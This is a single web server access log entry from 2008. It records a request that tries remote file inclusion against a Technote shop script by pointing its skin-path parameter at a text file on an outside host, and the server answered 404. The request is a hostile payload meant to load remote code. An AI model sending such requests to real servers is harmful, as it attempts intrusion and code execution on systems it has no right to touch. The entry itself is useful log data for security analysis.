70.38.12.204 - - [21/Nov/2008:08:33:48 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.enjoykankoku.jp/parti/idih.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "blue-dogz.com"
